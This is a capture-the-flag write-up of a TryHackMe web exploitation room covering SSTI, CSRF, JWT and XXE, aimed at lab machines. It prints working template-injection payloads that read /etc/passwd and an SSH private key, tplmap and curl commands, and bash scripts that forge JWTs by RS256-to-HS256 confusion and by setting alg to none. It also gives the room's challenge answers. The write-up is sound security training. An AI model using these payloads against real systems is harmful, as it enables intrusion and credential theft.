ZTH: Obscure Web vuls is a learning room on TryHackMe created by Paradox. This room allows you to learn and practice exploiting a range of unique web vulnerabilities such as SSTI, CSRF, JWT and XXE.
Task 1 : Covers the intro and tells us that we will be learning SSTI, CSRF, JWT and XXE.
Click “Question Done” to proceed
Task 2: Provides an overview on how the room is divided up and the format on how questions and challenges will be presented.
Click “Question Done” to proceed
Task 3: Discusses Server Side Templates and what Server Side Template Injection SSTI is.
Click “Question Done” to proceed
Task 4: Provides explores template injection a little further with some detailed examples.
Q1: How would a hacker(you :) ) cat out /etc/passwd on the server(using cat with the rce payload)
The answer below is provided as a guided example on the page.
{{config.__class__.__init__.__globals__[‘os’].popen(‘cat /etc/passwd’).read()}}Q2: What about reading in the contents of the user test's private ssh key.(use the read file one not the rce one)
The answer below is provided as a guided example on the page.
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/home/test/.ssh/id_rsa').read() }}Task 5: Automatic Exploitation of SSTI
Q:1 How would I cat out /etc/passwd using tplmap on the ip:port combo 10.10.10.10:5000, with the vulnerable param “noot”.
tplmap -u http://10.10.10.10:5000/ -d 'noot' --os-cmd "cat /etc/passwd"Task 6: SSTI Challenge
For this challenge you will need to start the Vulnerable Machine and using SSTI obtain the /flag file on the machine.
We can use a modified version of Task 4 to obtain the flag.
{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}
Additionally this same command can be run from curl via the command line.
curl -X POST -F “name={{config.__class__.__init__.__globals__[‘os’].popen(‘cat /flag’).read()}}” http://10.10.198.181/-X = Request
-F = Form reques
Go ahead and terminate your machine and startup the machine in Task 14 so it is ready for you to go when we get there.
Task 7: What is CSRF
This section will walk us through a quick understanding or Cross Site Request Forgery.
Click “Question Done” to proceed
Task 8: Manual exploitation of CSRF
Very good explanation of CSRF and how it looks through a proxy like Burp.
Click “Question Done” to proceed
Task 9: Automatic Explotation
Discusses automatic tools like XSSRFProbe and how to install and use it.
Q: What parameter allows us to generate a POC(actual exploit)?
--maliciousTask 10: CSRF Challenge
Due to the nature of CSRF, I can’t really give you a challenge to complete with a flag. So I’ll give you one without a flag! Your challenge is to make a website vulnerable to CSRF, and exploit it
Click “Question Done” to proceed
Task 11: Java Web Token JWT introduction
This section covers what Java Web Tokens are and how they are constructed.
Click “Question Done” to proceed
Task 12: Manual JWT Exploitation
This section covers the basics of exploiting Java Web Tokens. Pay attention here, we may need to refer back to this section in a bit.
Click “Question Done” to proceed
Task 13: Automatic JWT exploitation
There really isn’t a one stop shop for automatic JWTs and need to be looked at on a case by case basis.
Click “Question Done” to proceed
Task 14: JWT Challenge
For this challenge you will need to start the vulerable machine and interact with a webpage to obtain a JWT token and exploit the token using the steps provided in the previous section.
This question was really fun, however because the tokens expired in a few minutes I decided to just write up a dirty bash script to make the submission.
After updating the IP to the IP of the JWT webserver you can save and perform a
chmod +x exploit.shthen you should just be able to run./exploit.shand it will execute.
#!/bin/bash# Update the IP to the IP of the vulnerable machineip=10.10.10.10
echo ""
echo "TryHackMe ZTH: Obscure Web Vulns JWT Challenge"
echo ""echo "[+] downloading public key "
if [ -f public.pem ] ;then
echo "[i] Removing old Public Key"
rm public.pem
fi
wget --quiet http://$ip/public.pem &1>/dev/nullecho "[+] Obtaining JWT file from http://$ip"
curl -s http://$ip | grep -o ey.* >jwtpart1=$(cat jwt | cut -f1 -d".")
part2=$(cat jwt | cut -f2 -d".")
part3=$(cat jwt | cut -f3 -d".")echo "[+] Changing Header from RS256 to HS256"newpart1=$(echo $part1 | base64 -d | sed 's/RS256/HS256/g' | base64)echo "[+] Converting public key to hex"cat public.pem | xxd -p | tr -d "\\n" >public.xxd
publicxxd=$(cat public.xxd)echo "[+] Signing the JWT with the valid HS256 key"key=$(echo -n $newpart1.$part2 | openssl dgst -sha256 -mac HMAC -macopt hexkey:`cat public.xxd`| tr -d " " | cut -f2 -d "=")echo "[+] Decode the hex to binary and reencoded the data" secret=$(python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('"$key"')).replace('=','')\")")echo ""
echo "---Manual Submission--"
echo $newpart1.$part2.$secret
echo "----------------------"
echo ""
final=$newpart1.$part2.$secretecho "[+] Attempting submission via curl"curl -s -X POST -F "jwt=$final" http://$ip/rs256.php | sed 's/<.*>//g'# The sed 's/<.*>//g' at the last part of the curl command is to pull out all the HTML tags and display text.
Task 15: JWT Intro
Discusses other vulnerabilities with JWT libraries and how important it is for developers to read the RFC or RTFM.
Click “Question Done” to proceed
Task 16: Manual JWT exploitation
Shows a manual walkthrough of exploiting JWT by setting the algorithm to NONE…
Click “Question Done” to proceed
Task 17: Automatic JWT exploitation
There really isn’t any tool that can perform automatic exploitation of JWT tokens. This is a manual and inspect as you go type situation.
Click “Question Done” to proceed
Task 18: JWT Challenge
Startup the machine and find the flag
The first attempt with asdf:asdf didn’t do anything… but after that we were provided with the credentials of a normal user.
Opening up the developer tools either by pressing SHIFT-F9 to open the storage inspector or by clicking on the “hamburger menu” in the upper right of firefox and selecting “webdeveloper-> storage Inspector” you will be able to inspect the JWT cookie.
Double clicking in the cookie value area you can copy the actual cookie which is listed below.
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdXRoIjoxNjMxMDY4NTU1MDI5LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo4MC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzgwLjAiLCJyb2xlIjoidXNlciIsImlhdCI6MTYzMTA2ODU1NX0.gIIIBXfJRO9Ci86iP28FF-hWMszl5Ee6-ibJjzSoHCEThe previous couple of tasks identified how to manipulate this cookie and modify it to become an admin on the site.
A little bash script below will take the above JWT cookie and remove the HS256 requirement and set it to non and then make the user an admin.
#!/bin/bashif [ $# -eq 0 ] ; then
echo "USAGE: $0 JavaWebToken"
exit
fi
jwt=$1
part1=$(echo -n $jwt | cut -f1 -d'.' | base64 -di | sed 's/HS256/none/g'| base64)
part2=$(echo -n $jwt | cut -f2 -d'.' | base64 -di | sed 's/user/admin/g' | base64)
echo ""
echo $part1.$part2. | tr -d ' ='
By selecting the new modified cookie and pasting it into the firefox cookie jar where we originally obtained it and refresh the website…
Task 19: XXE Intro
Click “Question Done” to proceed
Task 20: Manual exploitation of XXE
Click “Question Done” to proceed
Task 21: Automatic exploitation of XXE
This is very difficult to have a one size fits all auto XXE solution.
Click “Question Done” to proceed
Task 22: XXE Challenge
Q: How many users are on the system?
Lets give it a go! …and refer to Task 20 if you have any questions.
Regardless of what I put in the form it gives the same error…
Lets fire up burp and intercept the traffic being submitted.
Some XML, this is consistent with challenge. Lets try and manipulate it.
By placing the XXE file:///etc/passwd we can now see the passwd file in the right hand pane of burp.
By counting the number or users listed in /etc/passwd we can answer how many users are on the system.
Q: How many users are on the system?
A: 31
Q: What is the name of the user with a UID of 1000?
A: para
Task 23: JWT once again
Click “Question Done” to proceed
Task 24: Bruteforcing JWT tokens
Click “Question Done” to proceed
Task 25: Challenge Bruteforcing JWT tokens
Q: Given the following tokeneyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE
What is the secret?
For this challenge I had to run my own Kali instance, as the TryHackMe attack box would not install npm or jwt-cracker.
Regardless …once jwt-cracker was installed it cracked the token in a few seconds.
Thank you Paradox for such a informative and fun room to learn web exploits!
